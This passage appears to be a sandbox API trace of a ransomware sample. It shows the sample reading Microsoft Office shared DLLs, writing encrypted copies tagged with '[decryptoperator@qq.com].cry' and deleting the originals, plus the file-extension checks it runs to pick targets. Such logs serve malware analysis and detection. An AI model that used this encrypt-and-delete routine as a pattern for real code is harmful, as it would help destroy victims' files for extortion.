lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x665a0, lpOverlapped=0x0) returned 1 [0053.139] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x665b0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x665b0, lpOverlapped=0x0) returned 1 [0053.154] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.154] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0053.154] SetEndOfFile (hFile=0x210) returned 1 [0053.154] CloseHandle (hObject=0x210) returned 1 [0053.154] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.154] SetEndOfFile (hFile=0x220) returned 1 [0053.247] CloseHandle (hObject=0x220) returned 1 [0053.247] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.247] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll")) returned 1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString=".doc") returned 4 [0053.248] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.248] lstrlenW (lpString=".docx") returned 5 [0053.248] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0053.248] lstrlenW (lpString=".pdf") returned 4 [0053.248] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.248] lstrlenW (lpString=".xls") returned 4 [0053.248] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.248] lstrlenW (lpString=".xlsx") returned 5 [0053.248] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0053.248] lstrlenW (lpString=".ppt") returned 4 [0053.248] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString=".zip") returned 4 [0053.248] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.248] lstrlenW (lpString=".rar") returned 4 [0053.248] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.248] lstrlenW (lpString=".bz2") returned 4 [0053.248] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.248] lstrlenW (lpString=".7z") returned 3 [0053.248] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString=".dbf") returned 4 [0053.248] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString=".1cd") returned 4 [0053.248] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString=".jpg") returned 4 [0053.248] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.248] lstrlenW (lpString=".doc") returned 4 [0053.248] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.249] lstrlenW (lpString=".docx") returned 5 [0053.249] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0053.249] lstrlenW (lpString=".pdf") returned 4 [0053.249] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.249] lstrlenW (lpString=".xls") returned 4 [0053.249] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.249] lstrlenW (lpString=".xlsx") returned 5 [0053.249] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0053.249] lstrlenW (lpString=".ppt") returned 4 [0053.249] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.249] lstrlenW (lpString=".zip") returned 4 [0053.249] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.249] lstrlenW (lpString=".rar") returned 4 [0053.249] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.249] lstrlenW (lpString=".bz2") returned 4 [0053.249] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.249] lstrlenW (lpString=".7z") returned 3 [0053.249] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.249] lstrlenW (lpString=".dbf") returned 4 [0053.249] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.249] lstrlenW (lpString=".1cd") returned 4 [0053.249] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0053.249] lstrlenW (lpString=".jpg") returned 4 [0053.249] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.249] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".cry") returned 1 [0053.249] lstrlenW (lpString="MSOINTL.REST.IDX_DLL") returned 20 [0053.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.250] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1388416) returned 1 [0053.250] CloseHandle (hObject=0x220) returned 1 [0053.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 0x20 [0053.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.250] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.250] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0053.352] GetLastError () returned 0x0 [0053.352] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0053.612] WriteFile (in: hFile=0x1f4, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0053.632] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x52f90, lpOverlapped=0x0) returned 1 [0053.651] WriteFile (in: hFile=0x1f4, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x52fa0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x52fa0, lpOverlapped=0x0) returned 1 [0053.660] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.660] WriteFile (in: hFile=0x1f4, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xfc, lpOverlapped=0x0) returned 1 [0053.660] SetEndOfFile (hFile=0x1f4) returned 1 [0053.660] CloseHandle (hObject=0x1f4) returned 1 [0053.660] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.660] SetEndOfFile (hFile=0x220) returned 1 [0053.663] CloseHandle (hObject=0x220) returned 1 [0053.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.664] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 1 [0053.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.664] lstrlenW (lpString=".doc") returned 4 [0053.664] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0053.664] lstrlenW (lpString=".docx") returned 5 [0053.664] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0053.664] lstrlenW (lpString=".pdf") returned 4 [0053.664] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0053.664] lstrlenW (lpString=".xls") returned 4 [0053.664] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0053.664] lstrlenW (lpString=".xlsx") returned 5 [0053.664] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0053.664] lstrlenW (lpString=".ppt") returned 4 [0053.664] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0053.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.664] lstrlenW (lpString=".zip") returned 4 [0053.664] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0053.664] lstrlenW (lpString=".rar") returned 4 [0053.664] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0053.664] lstrlenW (lpString=".bz2") returned 4 [0053.665] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString=".7z") returned 3 [0053.665] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.665] lstrlenW (lpString=".dbf") returned 4 [0053.665] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.665] lstrlenW (lpString=".1cd") returned 4 [0053.665] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.665] lstrlenW (lpString=".jpg") returned 4 [0053.665] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.665] lstrlenW (lpString=".doc") returned 4 [0053.665] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString=".docx") returned 5 [0053.665] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0053.665] lstrlenW (lpString=".pdf") returned 4 [0053.665] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString=".xls") returned 4 [0053.665] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString=".xlsx") returned 5 [0053.665] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0053.665] lstrlenW (lpString=".ppt") returned 4 [0053.665] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.665] lstrlenW (lpString=".zip") returned 4 [0053.665] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0053.665] lstrlenW (lpString=".rar") returned 4 [0053.665] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0053.666] lstrlenW (lpString=".bz2") returned 4 [0053.666] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0053.666] lstrlenW (lpString=".7z") returned 3 [0053.666] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.666] lstrlenW (lpString=".dbf") returned 4 [0053.666] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0053.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.666] lstrlenW (lpString=".1cd") returned 4 [0053.666] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0053.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0053.666] lstrlenW (lpString=".jpg") returned 4 [0053.666] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0053.666] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.666] lstrlenW (lpString="ACEERR.DLL") returned 10 [0053.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.769] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=43408) returned 1 [0053.769] CloseHandle (hObject=0x1c4) returned 1 [0053.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 0x20 [0053.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.769] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.770] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.770] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.770] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.771] GetLastError () returned 0x0 [0053.771] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0xa990, lpOverlapped=0x0) returned 1 [0053.796] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xa9a0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xa9a0, lpOverlapped=0x0) returned 1 [0053.800] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.800] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0053.800] SetEndOfFile (hFile=0x21c) returned 1 [0053.800] CloseHandle (hObject=0x21c) returned 1 [0053.801] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.801] SetEndOfFile (hFile=0x1c4) returned 1 [0053.801] CloseHandle (hObject=0x1c4) returned 1 [0053.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.802] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 1 [0053.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.802] lstrlenW (lpString=".doc") returned 4 [0053.802] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.802] lstrlenW (lpString=".docx") returned 5 [0053.802] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.802] lstrlenW (lpString=".pdf") returned 4 [0053.802] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.802] lstrlenW (lpString=".xls") returned 4 [0053.802] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.802] lstrlenW (lpString=".xlsx") returned 5 [0053.802] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.802] lstrlenW (lpString=".ppt") returned 4 [0053.802] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.802] lstrlenW (lpString=".zip") returned 4 [0053.802] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.802] lstrlenW (lpString=".rar") returned 4 [0053.802] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.802] lstrlenW (lpString=".bz2") returned 4 [0053.802] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.802] lstrlenW (lpString=".7z") returned 3 [0053.802] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.803] lstrlenW (lpString=".dbf") returned 4 [0053.803] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.803] lstrlenW (lpString=".1cd") returned 4 [0053.803] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.803] lstrlenW (lpString=".jpg") returned 4 [0053.803] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.803] lstrlenW (lpString=".doc") returned 4 [0053.803] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.803] lstrlenW (lpString=".docx") returned 5 [0053.803] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.803] lstrlenW (lpString=".pdf") returned 4 [0053.803] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.803] lstrlenW (lpString=".xls") returned 4 [0053.803] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.803] lstrlenW (lpString=".xlsx") returned 5 [0053.803] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.803] lstrlenW (lpString=".ppt") returned 4 [0053.803] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.803] lstrlenW (lpString=".zip") returned 4 [0053.803] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.803] lstrlenW (lpString=".rar") returned 4 [0053.804] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.804] lstrlenW (lpString=".bz2") returned 4 [0053.804] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.804] lstrlenW (lpString=".7z") returned 3 [0053.804] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.805] lstrlenW (lpString=".dbf") returned 4 [0053.805] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.805] lstrlenW (lpString=".1cd") returned 4 [0053.805] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0053.805] lstrlenW (lpString=".jpg") returned 4 [0053.805] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.805] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.805] lstrlenW (lpString="ACEEXCL.DLL") returned 11 [0053.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.806] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=899992) returned 1 [0053.806] CloseHandle (hObject=0x1c4) returned 1 [0053.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll")) returned 0x20 [0053.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0053.806] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.806] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 